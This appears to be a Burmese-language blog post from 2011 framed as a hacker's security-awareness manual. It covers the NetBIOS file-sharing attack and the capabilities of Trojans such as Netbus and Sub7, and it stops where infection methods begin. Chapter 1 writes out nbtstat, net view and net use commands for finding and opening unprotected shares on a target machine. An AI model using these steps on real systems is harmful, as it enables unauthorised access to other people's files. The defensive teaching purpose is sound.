ဟက္ကာမ်ားဧ။္လွ်ိဳ႕ဝွက္ခ်က္ကိုေ | Aug 11, '11 3:17 AM for everyone |
DISCLAIMER
The author of this manual will like to express my concerns about the misuse
of the information contained in this manual. By reading this manual you
agree to the following stipulations. Any actions and or activities related to the
material contained within this manual is solely your responsibility.
The misuse of the information in this manual can result in
criminal charges brought against the persons in question. The
authors will not be held responsible in the event any criminal
charges be brought against any individuals misusing the
information in this manual to break the law.
(Note This manual was created for Information purposes only.)
စကားဦး
ေန႔စဥ္နဲ႔အမွ် ႀကီးထြားလာတဲ့ Internet ထဲမွာ ကၽႊန္ေတာ္ႏွင့္ စာဖတ္သူတို႔ဟာ ႀကီးမားက်ယ္ေျပာလွတဲ့ သတင္းအခ်က္အလက္ ပင္လယ္ျပင္ႀကီးထဲက ေရေပါက္ငယ္ေလးပမာပါပဲ။ ကိုယ္မသိတဲ့ကိစၥက ကိုယ့္ကိုအမွဳမပတ္ႏိုင္ဘူးလို႔ ေျပာၾကေပမဲ့ အင္တာနက္ႏွင့္ပတ္သက္လာရင္ ဒါကဆန္႔က်င္မွဳတစ္ခုပါ။ အင္တာနက္ေပၚမွာ သန္းေပါင္းမ်ားစြာေသာ ကြန္ပ်ဳတာအသံုးျပဳေတြဟာ ဝင္လိုက္ထြက္လိုက္ရွိေနပါတယ္။ သတင္းအခ်က္အလက္ေတြဟာ ရြာကေန ၿမိဳ႕အကြာအေဝးကို ႏွလံုးခုန္ႏွဳန္းတစ္ခ်က္မွာ ပို႔ေပးေနပါတယ္။
စာဖတ္သူလို သာမန္အသံုးျပဳသူေတြ အတြက္ ျမန္ဆန္လွေသာ သတင္းအခ်က္အလက္ လမ္းမႀကီးေပၚမွာ အႏၱရာယ္မ်ားလွပါေပတယ္။ ၃၀ မွ ၄၀ ရာခိုင္ႏွဳန္း အသံုးျပဳသူေတြဟာ ကြန္ပ်ဳတာေတြရဲ့ ေနာက္ကြယ္မွာ ဘာေတြအလုပ္လုပ္ေနလဲဆိုတာ သတိမထားမိၾကပါဘူး။ က်န္တဲ့ အသံုးျပဳသူေတြဟာ မိမိရဲ့ စနစ္ဟာ တိုက္ခိုက္ျခင္း၊ အသံုးျပဳခံေနရျခင္းကို ရိုးသားစြာ ဂရုမစိုက္ျခင္း၊ သိရွိႏိုင္ေသာ အေျခခံအသိ မရွိၾကပါဘူး
စာဖတ္သူဟာ မိမိရဲ့ အင္တာနက္ေပၚမွ လြတ္လပ္ခြင့္ကို သိရွိလိုတဲ့အတြက္ ဖတ္ေနျခင္းလို႔ယူဆပါသည္။ ျဖစ္လဲျဖစ္သင့္ပါသည္။ အင္တာနက္ေပၚမွာ ဘယ္အရာမွ မိမိရဲ့ မ်က္စိနဲ႔ျမင္ရာတဲ့တိုင္းဟာ မိမိမ်က္စိနဲ႔ျမင္တဲ့အတိုင္းမဟု
မိမိသိတဲ့ အခ်က္အလက္ဟာ ဘယ္ေတာ့မွ မလံုေလာက္ပါဘူး သတင္းအခ်က္အလက္သည္ စြမ္းအားျဖစ္သည္ႏွင့္အမွ် မိမိဟာသိရွိေလ အင္တာနက္ေပၚက အတုအေယာင္ေတြကို ေရွာင္ႏိုင္ေလျဖစ္ပါလိမ့္မယ္။
ဒီလက္စြဲစာအုပ္မွာ ကၽႊန္ေတာ္ဟာ စာဖတ္သူကို စိုးရိမ္ေစမဲ့ အေၾကာင္းအရာမ်ားကို တင္ျပသြားပါမယ္။ တစ္ခ်ိဳ႕အရာေတြဟာ စာဖတ္သူကို ကြန္ပ်ဳတာရွိျခင္းကို ထင္ေယာင္ထင္မွား ျဖစ္ေကာင္းျဖစ္ေစ ႏိုင္ပါမယ္။ ဒါေပမဲ့ စိတ္ဓါတ္က်စရာ မလိုပါဘူး ဘာျဖစ္လို႔လဲဆိုေတာ့ ကၽႊန္ေတာ္စာေရးသူဟာ စာဖတ္သူ မိမိကိုယ္ကို ဘယ္လိုကြာကြယ္ႏိုင္တယ္ဆိုတာ ေျပာျပသြားမွာပါ။
ဒာင္တာနက္ရဲ့ ဆိုးက်ိဳးေတြကို ေျပာျပရျခင္းဟာ ကၽႊန္ေတာ္က စာဖတ္သူအတြက္ ဘာအႏၱရာယ္ေတြရွိတယ္ဆိုတာ တင္ျပဖို႔လိုအပ္တယ္ ခံစားရလို႔ပါ။
ကၽႊန္ေတာ္ဟာ ဒီလက္စြဲစာအုပ္ကို လမ္းျပအေနႏွင့္ ေရးျခင္းျဖစ္ပါတယ္။ စာဖတ္သူရဲ့ စနစ္တစ္ခုကို Hackers ေတြဟာ ဘယ္လိုထိန္းခ်ဳပ္ခြင့္ရေအာင္ စနစ္ရဲ့အားနည္းခ်က္ေတြ၊ Programs ေတြသံုးၿပီး ယူႏိုင္လဲဆုိတာ ေျပာျပျခင္းျဖစ္ပါတယ္။ ဒီလက္စြဲသည္ အကုန္လံုးကို မတင္ျပႏိုင္ပါ။ သို႔ေသာ္လည္း အေျခခံ နည္းမ်ားသိျခင္းျဖင့္ အကယ္၍ စာဖတ္သူသည္ Hackers ေတြဘာေတြလုပ္လဲ ဘယ္လိုလုပ္လဲ သိရွိပါက မိမိကိုယ္ကို ကြာကြယ္ႏိုင္ရန္ အေနအထားေကာင္းတစ္ခုမွာ ရွိႏိုင္ပါသည္။
စကားခ်ပ္ - ဒီစာအုပ္တစ္အုပ္လံုးတြင္ Hacker ကို Reference စကားလံုးအေနနဲ႔ သံုးစြဲသြားမွာျဖစ္ပါသည္။ Hacker မ်ားသည္ မီဒီယာမ်ားဧ။္ ေရာင္းေကာင္းေသာ စကားလံုးတစ္လံုးအေနျဖင့္ အသံုးခ်ျခင္းေၾကာင့္ လူေတြသည္ အထင္မွားလ်က္ရွိပါသည္။ သို႔ပါေသာ္လည္း Hacker ဆိုေသာစကားလံုးကို စာေရးရာတြင္လြယ္ကူေစရန္ အလို႔ငွာ သံုးစြဲျခင္းသာျဖစ္ပါသည္။
ေအာက္ပါ အေၾကာင္းအရာမ်ားသည္ တင္ျပသြားမဲ့ အေၾကာင္းအရာေတြက အနည္းငယ္ပါ။
* Hackers ေတြ ဘယ္လို စနစ္တစ္ခုလဲ ဝင္ေရာက္လဲ
* ဘယ္လို အရာေတြ အသံုးျပဳလဲ
* ဟက္ကာတစ္ေယာက္ဟာ စာဖတ္သူဧ။္ အိမ္ကို စာဖတ္သူဧ။္ ကြန္ပ်ဳတာမွ ဘယ္လိုေစာင့္ၾကည့္ႏိုင္ပံု (ျမန္မာျပည္ဧ။္ Dial Up လိပ္ႏွဳန္း နဲ႔ေတာ့မယံုခ်င္ဘူးထင္ပါတယ္။ ဒါေပမဲ့ ဘယ္လိုလုပ္ႏိုင္လဲဆိုတာ ေျပာျပသြားပါမယ္။)
* ဘယ္လို အခ်က္အလက္ေတြကို အခြင့္ရွိပံု ႏွင့္ စာဖတ္သူဘာေၾကာင့္ ကာကြယ္သင့္ပံု
* ဘယ္လို သတင္း ႏွင့္ လွည့္ဖ်ားမွဳမ်ား အသံုးျခပံု
* Antivirus software တစ္ခုထဲႏွင့္ မလံုေလာက္ပံု
* ဘာေတြကို ဂရုစိုက္ရမလဲ အကယ္၍ စာဖတ္သူဧ။္ ကြန္ပ်ဳတာသည္ က်ဳးေက်ာ္ခံရပါက
ဘယ္လိုအေၾကာင္းျပခ်က္နဲ႔မွ ကၽႊန္ေတာ္စာေရးသူသည္ ဒီလက္စြဲသည္ စာဖတ္သူကို အလံုးစံုကာကြယ္မွဳေပးမယ္လို႔ ရယ္ဖြယ္ေကာင္းေသာ အာမခံခ်က္ကို မေပးပါ။ ကၽႊန္ေတာ္ ေျပာျပမဲ့ အေၾကာင္းအရာမ်ားကို ေလ့လာၿပီးေတာ့ စာဖတ္သူသည္မိမိကိုယ္ေရးအခ်က္
စာဖတ္သူသည္ အင္တာနက္ကို ၂၄ နာရီ (သို႔) ၁၅ မိနစ္ ဆက္သြယ္ျခင္းဟာ မိမိဧ။္စနစ္အႏၱရာယ္ရွိမွဳ မရွိမွဳႏွင့္ မဆိုင္ပါ။ ၁၅မိနစ္တြင္းမွာပင္ စာဖတ္သူဧ။္ ကိုယ္ပိုင္စနစ္ကပင္ စာဖတ္သူကို ဝင္ခြင့္ပိတ္ထားႏိုင္ျခင္း၊ စာဖတ္သူဧ။္ ဘဏ္အခ်က္အလက္ ၊ ကိုယ္ပိုင္လိပ္စာမ်ား ပါသြားႏိုင္ပါသည္။
ကၽႊန္ေတာ္သည္ စာဖတ္သူကို စိတ္ေခ်ာက္ခ်ားေအာင္ ျပဳလုပ္ေနျခင္းမဟုတ္ပါ။ ကၽႊန္ေတာ္ေျပာေနျခင္းသည္ အကယ္၍ စာဖတ္သူဂရုမစိုက္ပါက စာဖတ္သူကိုယ္တိုင္ပင္ အႏၱရာယ္ကို တံခါးဖြင့္ေပးသလိုပါပဲ။ စာဖတ္သူသည္ ကၽႊန္ေတာ့္ကို အထင္အလဲြေကာင္းလဲြႏိုင္ပါသည္။ ကၽႊန္ေတာ့္ကို စာဖတ္သူသည္ စာဖတ္သူသည္ Email စစ္ျခင္းႏွင့္ Chat ျခင္းကလဲြရင္ ဘာမွမလုပ္တဲ့အတြက္ ဒါေတြမျဖစ္ႏိုင္ပါဘူးလို႔ ေျပာဆိုေကာင္းေျပာဆိုပါလိမ့္မယ္
အခန္း ၁ (ကြန္ပ်ဳတာကို ၁၅ စကၠန႔္ အတြင္းထုိးေဖာက္ျခင္း)
ကြန္ပ်ဳတာကို ၁၅ စကၠန႔္ အတြင္းထုိးေဖာက္ျခင္း…
မွန္ပါသည္။ လုပ္လို႔ရပါတယ္။ အကယ္၍စာဖတ္သူဧ။္ စနစ္သည္ တိက်ေသာ လံုျခံဳေရးအားနည္းခ်က္မ်ား ရွိပါက ၁၅ စကၠန္႔ပိုင္းအတြင္းပင္ ခ်ိဳးေဖာက္ခံႏိုင္ရပါသည္။
ဒီအခန္းကိုစတင္ဖို႔အတြက္ ကၽႊန္ေတာ္စာဖတ္သူကို လုပ္ခိုင္းစရာတစ္ခ်ိဳ႕ရွိပါသည္။ အကယ္၍စာဖတ္သူသည္ Dial Up အသံုးျပဳပါက ခ်ိတ္ဆက္ဖို႔လိုပါလိမ့္မယ္။ DSL (သို႕) Cable သံုးပါက ဒီအဆင့္ကိုတခါတည္း ျပဳလုပ္ႏိုင္ပါသည္။
Windows 2000 ထိ OS မ်ားအတြက္
• Start Menu ကိုႏွိပ္ပါ
• Run ကိုရွာၿပီး ႏွိပ္ပါ
• Winipcfg ကို Box ထဲတြင္ ရိုက္ထဲ့ၿပီး Enter ႏွိပ္ပါ
• ဒီ Windows ေလးကို ျမင္ေတြ႕ရပါမယ္
Windows XP အထက္ OS မ်ားအတြက္
• Start Menu ကိုႏွိပ္ပါ
• Run ကိုရွာၿပီး ႏွိပ္ပါ
• cmd ကို Box ထဲတြင္ ရိုက္ထဲ့လိုက္ပါ
• Console ေပၚလာေသာအခါ ipconfig ဆိုၿပီးရိုက္ပါ (သို႔) Network နဲ႔ပတ္သက္တဲ့ အခ်က္အလက္အကုန္ေတြ႕ခ်င္ပါက ipconfig /all ရိုက္လို႔လဲရပါတယ္
• ဒီအဆင့္ကိုျမင္ေတြ႕ရပါမယ္
* For editorial reason the above info has been omitted *
IP Add ေနရာမွာ ျမင္ရမွာေတြကေတာ့ ဒီလိုမ်ိဳးဂဏန္းေတြပါ။ 207.66.55.1 (ကြဲျပားႏိုင္ပါသည္။)
အကယ္၍ Dial Up အသံုးျပဳပါက IP add ကို PPP Adapter ေအာက္မွာရွာေတြ႕မွာပါ။ အကယ္၍ တစ္ျခားနည္းလမ္းမ်ားကို အသံုးျပဳဆက္သြယ္ပါက IP add ေတြကို တစ္ျခား Adapter Name ေတြေအာက္မွာ ရွာေတြ႕မွာျဖစ္မွာပါ။ List ေတြကို ေဖာ္ျပထားေသာ ျမွားေနရာကို ႏွိပ္ျခင္းျဖင့္ ထပ္ေတြ႕ႏိုင္ပါမယ္။
IP Add ကိုသိေသာအခါမွာ ေနာက္ထပ္ Console တစ္ခုကိုထပ္ဖြင့္ၿပီး Console ထဲမွာ ဒါကိုရိုက္ထဲ့ရမွာပါ။
Nbtstat –A ip add (ဥပမာ nbtstat –A 207.66.55.1) ဒီေနရာမွာေတာ့ A သည္ Capital Letter ျဖစ္ရပါမယ္။ nbtstat commands မ်ားကို ထပ္သိခ်င္တယ္ဆိုရင္ ဒါကို ရိုက္ၿပီးေလ့လာႏိုင္ပါသည္။ nbtstat /help
ဒီလိုပံုစံ Output ေလးကိုေတြ႕ရမွာပါ။
NetBIOS Remote Machine Name Table
______________________________
Name Type Status
------------------------------
J-1 <00> UNIQUE Registered
WORK <00> GROUP Registered
J-1 <03> UNIQUE Registered
J-1 <20> UNIQUE Registered
WORK <1E> GROUP Registered
WORK <1D> UNIQUE Registered
__MSBROWSE__.<01> GROUP Registered
(Again info has been omitted due to privacy reasons)
< > ထဲမွာရွိတဲ့ ဂဏန္းေတြဟာ Hex Code တန္ဖိုးေတြျဖစ္ပါတယ္။ ဒါေပမဲ့ ဒီမွာ ကၽႊန္ေတာ္စိတ္ဝင္စားတာက <20> တန္ဖိုးပါတဲ့ Hex code ပါ။ အကယ္၍ 20 ကိုမေတြ႕ရင္ေတာ့ ဒါစာဖတ္သူအတြက္ သတင္းေကာင္းပါပဲ။ မဟုတ္ရင္ေတာ့ စာဖတ္သူ စဥ္းစားစရာေတြ ရွိလာပါလိမ့္မယ္။ ကၽႊန္ေတာ္ေရးသားကိုဖတ္ၿပီး စာဖတ္သူနားရွဳပ္သြားႏိုင္ပါတယ္။
ကဲ ရွင္းျပပါရေစ။ <20> ဆုိသည္မွာ စာဖတ္သူဧ။္ ကြန္ပ်ဳတာမွာ File and Printer Sharing ကိုဖြင့္ေပးထားလို႔ပဲ ျဖစ္ပါသည္။ ဒါက ဟက္ကာတစ္ေယာက္က စာဖတ္သူ ကြန္ပ်ဳတာဟာ File and Printer Sharing ကိုဖြင့္ေပးထားလား သိခ်င္ရင္ လုပ္မဲ့ အဆင့္ေတြပါ။ အကယ္၍ ဖြင့္ေပးထားတယ္ဆိုတာကို သိရွိပါက ဟက္ကာေတြက စနစ္ကိုထိန္းခ်ဳပ္ခြင့္ရရန္ ဆက္လုပ္သြားမွာပါ။
Note : Console ကထြက္ရန္ Exit လို႔ရိုက္ၿပီး Enter ႏွိပ္ထြက္ႏိုင္ပါသည္။
အထက္ပါ အခ်က္အလက္ေတြကိုသံုးၿပီး ဘယ္လိုထိန္းခ်ဳပ္ခြင့္ရေအာင္ လုပ္ႏိုင္လဲဆိုတာ ဒီေနရာကစၿပီး ကၽႊန္ေတာ္ရွင္းျပသြားပါမယ္။
အလားအလာရွိတဲ့ ဟက္ကာတစ္ေယာက္ဟာ IP Add အစုတစ္ခုကို Scan လုပ္ၿပီး File and Printer Sharing ကြန္ပ်ဳတာစနစ္ေတြကို ရွာေဖြမွာပါ။ ေတြ႕ရွိတာနဲ႔ခ်က္ျခင္း ဘာေတြစက္ေပၚမွာ မွ်ေဝထားလဲဆိုတာကို ဒီလိုၾကည့္ရွဳႏိုင္ပါသည္။ ဘယ္လိုလဲဆိုေတာ့ net view \\ <insert the targeted ip address here>
ထို႕ေနာက္ ဒီလုိပံုစံကိုရရွိမွာပါ။
Shared resources at \\ip_address
Sharename Type Comment
MY DOCUMENTS Disk
TEMP Disk
ဒါက ဟက္ကာကို ဘာေဖာ္ျပလဲဆိုေတာ့ သူ႕ရဲ့အလားအလာရွိတဲ့ သားေကာင္ဟာ သူဧ။္ My Documents ႏွင့္ Temp ဆိုတဲ့ Folders ႏွစ္ခုကို ကြန္ယက္ေပၚမွာ မွ်ေဝထားပါတယ္။ ထုိအထက္ပါအရာေတြကို လုပ္ပိုင္ခြင့္ရရွိရန္ ဟက္ကာသည္ ဒီ command ကို အသံုးခ်သြားမွာပါ။
Net use x: \\<put the targeted ip address here>\temp
Folder သည္ စကားဝွက္သို႔ ခံထားျခင္းမရွိပါက ဟက္ကာသည္ လြယ္လြယ္ကူကူပင္ ဝင္ခြင့္ရွိသြားမွာျဖစ္ပါသည္။ ဒီမွာ ကၽႊန္ေတာ္ေမးခ်င္တာက ဒါေတြကိုျပဳလုပ္ရန္ ဘယ္ေလာက္မ်ားၾကာႏိုင္ခဲ့လို႔လဲ။ စာဖတ္သူဧ။္ အေျဖကေကာ...
အၾကာႀကီးေတာ့ မဟုတ္ေလာက္ပါဘူး။ ဟုတ္တယ္ဟုတ္။ စာဖတ္သူတို႔ ဘယ္ႏွစ္ေယာက္မ်ားက File and Printer Sharing အေၾကာင္းမသိပဲနဲ႔ ဖြင့္ထားမိပါလဲ။
ဟုတ္ကဲ့ Ladies and Gentlemen။ ဒါကို Netbios Attack လို႔ေခၚပါတယ္။ အကယ္၍ မိမိအိမ္တြင္ အိမ္တြင္းကြန္ရက္ ခ်ိတ္ဆက္ထားရင္ ျဖစ္ႏိုင္တာက စာဖတ္သူဟာ File and Printer Sharing ကိုဖြင့္ထားႏိုင္ပါသည္။ စာဖတ္သူအကုန္လံုးဟာ ဒီလိုလုပ္ထားတယ္လို႔ ကၽႊန္ေတာ္မဆိုလိုပါ။ ဒါေပမဲ့ လုပ္တဲ့လူေတြအမ်ားႀကီးပါ။ အကယ္၍ မိမိသည္ ကြန္ရက္ေပၚမွာ အရင္းအျမစ္ေတြကို မွ်ေဝထားတယ္ဆိုရင္ Directory မ်ားကို စကားဝွက္ျဖင့္ ကာကြယ္ထားရန အၾကံေပးပါရေစ။ မိမိသည္ ကြန္ရက္ေပၚမွာ မွ်ေဝထားေသာ Directory မွန္သမွ် ဒီလုိပံုစံ မ်ိဳး Icon ေလးကို ေတြ႕ရွိရမွာပါ။
မိမိဧ။္ ကြန္ပ်ဳတာမွ မွ်ေဝထားေသာ အရင္းအျမစ္မ်ားကို ရွာေဖြရန္ ဒီအဆင့္မ်ားျပဳလုပ္ႏိုင္ပါသည္။
Console ကို ဖြင့္လိုက္ပါ။ မသိရင္ အေပၚမွာ ျပန္ရွာဖတ္ၾကည့္ပါ။ Console ထဲကို ေရာက္သာအခါ net share ဆိုၿပီး ရိုက္္ၾကည့္ပါ။ net share command သည္ မိမိ မွ်ေဝထားေသာ အရာမ်ားကို နာမည္ႏွင့္ ေနရာပါ ျပသႏိုင္ပါသည္။ မွ်ေဝထားေသာ အရာေတြထဲက $ sign ပါေသာ အရာမ်ားသည္ Administrative Shares မ်ားျဖစ္ပါသည္။ ေတာ္ေတာ္မ်ားမ်ားကို Windows သည္ သူ႔ဘာသာသူ Administrative Shares မ်ားအျဖစ္သတ္မွတ္ထားပါသည္။ ျပင္ဆင္ခ်င္ပါက ေသခ်ာအရင္ ေလ့လာေစခ်င္ပါသည္။
Netbios သည္ေရွးက်ေသာ စနစ္က်ဳးေက်ာ္ေသာ နည္းလမ္းတစ္ခုျဖစ္ပါသည္။ စနစ္မ်ားစြာသည္ ပံုမွန္ ကာကြယ္ေပးထားသျဖင့္ တစ္ခ်ိဳ႕သည္ သတိမမူမိပဲ ေသခ်ာကာကြယ္မွဳ အတ္ုင္းအဆမ်ား မလုပ္မိေသာေၾကာင့္ ေနာက္ပိုင္းတြင္ Netbios Attack သည္ လုပ္ခံရေသာ သားေကာင္မ်ား ျပန္လည္ျမင့္မားလာရသည္။
ဒီစာအုပ္ေနာက္ပိုင္းတြင္ အေျခခံကာကြယ္နည္းအခ်ိဳ႕ကို ေရးသားသြားပါမည္။ ဒီေနရာထိတုိင္ေအာင္ အလားအလာရွိေသာ အားနည္းခ်က္မ်ားကို ေရးသားရန္ စိတ္အားသန္ေနပါသျဖင့္ ေစာင့္ဖတ္ရန္ ေျပာၾကားလိုပါသည္။
အခန္း ၂ (Trojan Horse (လွ်ိဳ႕ဝွက္ဝင္လာေသာ ရန္သူ႕လက္ပါးေစ))
ကၽႊန္ေတာ္ Trojan Horse ရဲ့ ကြန္ပ်ဳတာႏွင့္မသက္ဆိုင္ေသာ သမိုင္းဇာတ္လမ္းေလးကို အစကမေျပာမလို႔ပဲ။ လူတိုင္းသိတယ္ထင္လို႔ပါ။ ဒါေပမဲ့ မသိတဲ့လူေတြရွိရင္ ဒါေလးသိရင္ ပိုၿပီးနားလည္မယ္ထင္လို႔ ထည့္ေရးလိုက္တာပါ။
ဒါက Trojan War လို႔ေခၚတဲ့ Greek ႏွင့္ Troy ၁၀ ႏွစ္ၾကာ စစ္ပဲြမွာ Troy ေတြရဲ့ ၁၀ ႏွစ္ၾကာအဝိုင္းခံေနရတဲ့ Greek ကသူ႕ၿမိဳ႕ကို စြန္႔ခြါသြားတဲ့ ပံုစံႏွင့္ ဟန္ေဆာင္ၿပီး ဂရိစစ္သည္အခ်ိဳ႕ကို ႀကီးမားတဲ့ ျမင္းရုပ္ႀကီးထဲထည့္ၿပီး ထားခဲ့ပါတယ္။ Troy ေတြက စစ္ေအာင္တဲ့ အထိမ္းအမွတ္နဲ႔ ျမင္းရုပ္ႀကီး သူတို႔ၿမိဳ႕ႀကီးထဲ သြင္းခဲ့တယ္။ ညက်ေတာ့မွ စစ္သည္ေတြဟာ ထြက္လာၿပီး ဂရိၿမိဳ႕တံခါးကိုဖြင့္ၿပီး တိတ္တဆိတ္ျပန္လာတဲ့ ဂရိတပ္မေတာ္အတြက္ တံခါးဖြင့္ေပးခဲ့ပါတယ္။ ထို႔ေနာက္ Troy ေတြရဲ့ ဝိုင္းခံထားရတဲ့ ဂရိေတြဟာ စစ္ပဲြကို ၿပီးဆံုးယံုတာမက Troy ေတြကို ေခ်မွဳန္းႏိုင္ခဲ့ပါတယ္။ ဒီမွာ လွည့္စားမွဳက ျမင္းရုပ္ပါ။ ဒီ Trojan Horse ရုပ္ထုကိုတာ Troy ေတြသူတို႔ၿမိဳ႕ထဲ မသြင္းခဲ့ရင္ Troy ေတြအႏိုင္ရႏိုင္မွာပါ။ ဒါေပမဲ့ သူတို႔ရဲ့ အားနည္းမွဳကို သူတို႔ဘာသာဖြင့္ေပးေအာင္ ေထာင္ေခ်ာက္ဆင္ခဲ့ႏိုင္ပါတယ္။ ဘယ္ေလာက္လွပတဲ့ လံုၿခံဳေရးအားနည္းခ်က္ကို မိမိကိုယ္တိုင္ဝင္ခြင့္ေပးေအာင္
ဒီလုိပါပဲ။ ကြန္ပ်ဳတာစနစ္ေတာ္ေတာ္မ်ားမ်ား
Trojan ဆိုတာ ဟက္ကာေတြကို စာဖတ္သူဧ။္ ကြန္ပ်ဳတာကို လံုးဝထိန္းခ်ဳပ္ႏိုင္ခြင့္ေပးတဲ
Trojans ေတြလုပ္ေဆာင္ေပးႏိုင္တဲ့ အဓိကထင္ရွားတဲ့ လုပ္ငန္း ၆ ရပ္က
[list=1]
* Remote Accessing (မိမိဧ။္ကြန္ပ်ဳတာကို တစ္ျခားအသံုးျပဳသူအတြက္ အေဝးတစ္ေနရာမွ အသံုးခ်ႏိုင္ေအာင္ျပဳလုပ္ေပးျ
* Data Destruction (အခ်က္အလက္မ်ား ဖ်က္ဆီးပစ္ျခင္း)
* Downloader (မိမိဧ။္ ကြန္ပ်ဳတာေပၚမွ အခ်က္အလက္မ်ားကို တစ္ျခားတစ္ေနရာသို႔ ေပးပို႔ႏိုင္ရင္ ကူညီေပးျခင္း) မွတ္ခ်က္ - သားေကာင္ဖက္ဆိုရင္ Uploader သေဘာျဖစ္ၿပီး၊ ဟက္ကာဖက္က Downloader သေဘာပါ။
* Server Trojan (Proxy, FTP , IRC, Email, HTTP/HTTPS, etc.)
* Security Software Disabler (မိမိဧ။္ ကြန္ပ်ဳတာေပၚမွာ လံုၿခံဳေရးအတိုင္းအတာမ်ားကို အလုပ္မလုပ္ရန္ျပဳလုပ္ျခင္း)
* Denial of Service attack (DoS) (မိမိဧ။္ ကြန္ပ်ဳတာမွ တစ္ျခား ကြန္ရက္ေပၚမွ ကြန္ပ်ဳတာမ်ားကို DoS attack ျဖင့္တိုက္ခိုက္ျခင္း) မွတ္ခ်က္ - ဟက္ကာတစ္ေယာက္ဟာ သူဧ။္ ထိန္းခ်ဳပ္မွဳေအာက္မွ သားေကာင္မ်ားကိုအသံုးျပဳ၍ တစ္ျခားကြန္ရက္ကို တိုက္ခိုက္ရာတြင္ အသံုးျပဳပါသည္။ BotNet Attack ေခၚတဲ့ ေနရာမွာ အသံုးခ်ပါတယ္။ Grid Computing ဆိုတဲ့ နည္းပညာကလာတဲ့ အေတြးအေခၚေလးတစ္ခုပါ။ Grid Computing ဆိုတာ ကြန္ရက္ႏွင့္ ခ်ိတ္ဆက္ထားေသာ ကြန္ပ်ဳတာမ်ားဧ။္ စြမ္းရည္ကို ေဝငွသံုးစြဲ၍ လုပ္ငန္းမ်ားကို စြမ္းအင္ျမင့္ျမင့္ လုပ္ေဆာင္ျခင္းျဖစ္ပါသည္။ ကၽႊန္ေတာ့္ဆီမွာ Distribute Password ေဖၚတဲ့ Software ဟာ ဒီလိုမ်ဳိးလုပ္ေပးပါတယ္။
ထင္ရွားတဲ့ ပ်က္စီးမွဳေတြကေတာ့ လုပ္ေပးႏိုင္တာကေတာ့ ေအာက္ပါထဲက တစ္ခ်ိဳ႕ျဖစ္ပါတယ္။
[list=1]
* ကြန္ပ်ဳတာေပၚက ေဒတာေတြကို ဖ်က္ပစ္ျခင္း၊ အေပၚကေန ထပ္ေရးျခင္း
* အသံုးျပဳတူက သိရွိ၍ Trojan ဖ်က္ပစ္ပါက ထပ္ၿပီး Trojan ကို ျပန္သြင္းျခင္း
* ဖိုင္ေတြကို cryptoviral extortion attack လို႔ေခၚတဲ့ နည္းပညာျဖင့္ (Encrypt) ဝွက္စာျပဳလုပ္ျခင္း။ ဒါကဘာလဲဆိုေတာ့ Trojan ေရးတဲ့ ကိုယ္တိုင္လူမွ ဒါမွမဟုတ္ ဒီ Attack ကိုလုပ္တဲ့ လူကသာျပန္ Decrypt လုပ္ႏိုင္ျခင္းပါ။ ေနာက္ပိုင္း Backdoor ျပဳလုပ္တဲ့နည္းလမ္းကို ဒီနည္းပညာနဲ႔အဆင့္ျမွင့္ ထားပါတယ္။ ဘာထူးျခားလဲဆိုေတာ့ Trojan ကေန Backdoor ကိုဖြင့္ေပးထားတဲ့ Port ကို တိုက္ခိုက္တဲ့လူကလြဲရင္ သံုးလို႔မရပါဘူး တစ္ေယာက္ကေတြ႕ရွိခဲ့ရင္ေတာင္ ဘယ္လိုမွကာကြယ္၊ ဖယ္ရွား၊ စစ္ေဆးလို႔မရပါဘူး။
* ေနာက္ထပ္ Adware, Spyware, and Viruses မ်ားကို အလြယ္တကူသြင္းလို႔ရေအာင္ ကူညီပါတယ္။
* Keylogger အေနျဖင့္ အသံုးခ်ျခင္း (keylogger ဆိုသည္မွာ စာဖတ္သူရိုက္လိုက္တဲ့ keystrokes ေတြကို Hacker ဆီပို႔ေပးျခင္း) အထင္မေသးပါနဲ႔ ဒီနည္းနဲ႔ စာဖတ္သူဧ။္ Bank Info၊ Personal Life ေတြပါသြားႏိုင္ပါသည္။
* Phising ျပဳလုပ္ျခင္း (စာဖတ္သူကိုလည္းေကာင္း၊ စာဖတ္သူ IP ကိုအသံုးျပဳ၍ တစ္ျခားသားေကာင္မ်ားကို လွည့္ျဖားရာတြင္ အကာအကြယ္ျပဳလုပ္ျခင္း)
* DDoS attack တြင္ စာဖတ္သူဧ။္ စက္ကို Zombie အေနႏွင့္အသံုးျချခင္း
* Fake Email Accounts မ်ား၊ Email Servers မ်ား စာဖတ္သူဧ။္ စက္ေပၚတြင္ တည္ေဆာက္ျခင္း (သို႔) စာဖတ္သူဧ။္ Email Account ကိုအသံုးျပဳ၍ Spam မ်ားပို႔ေဆာင္ျခင္းတို႔ ျဖစ္ပါသည္။
ဒါေတြကို ထပ္သိခ်င္ရင္ေတာ့ Wiki မွာသြားၾကည့္ပါ။ ဒါေတြက နည္းနည္းသစ္တာနဲ႔ အဓိကအခ်က္ေတြကို ေရးထားသာပါ။
အထင္ရွားဆံုးထဲက Trojans ေတြထဲက ႏွစ္ခုကေတာ့ Netbus ႏွင့္ Sub7 တို႔ျဖစ္ပါတယ္။ Trojans တိုင္းကဲ့သို႕ Netbus မွာ ႏွစ္ပိုင္းပါဝင္ပါတယ္။ Client ႏွင့္ Server အပိုင္းပဲျဖစ္ပါတယ္။ Server အပိုင္းကေတာ့ စာဖတ္သူရဲ့ စက္ကို သံုးစြဲရန္ ဟက္ကာက စာဖက္သူစက္ေပၚမွာ သြင္းေပးရတဲ့ Program ပါ။ ထုိသို႔ျပဳလုပ္ရန္ ဟက္ကာတစ္ေယာက္က ဘယ္လိုခ်ိဳးေဖာက္မလဲဆိုေတာ့
ခ်ိဳးေဖာက္ျခင္း
ရည္မွန္းခ်က္ : အလားအလာရွိတဲ့ သားေကာင္ကို ေရြးခ်ယ္၍ Server ကို သားေကာင္ကိုယ္တိုင္ သားေကာင္ဧ။္စက္ေပၚတြင္ သြင္းေစရန္ႀကိဳးစားျခင္း
နည္းလမ္း ၁
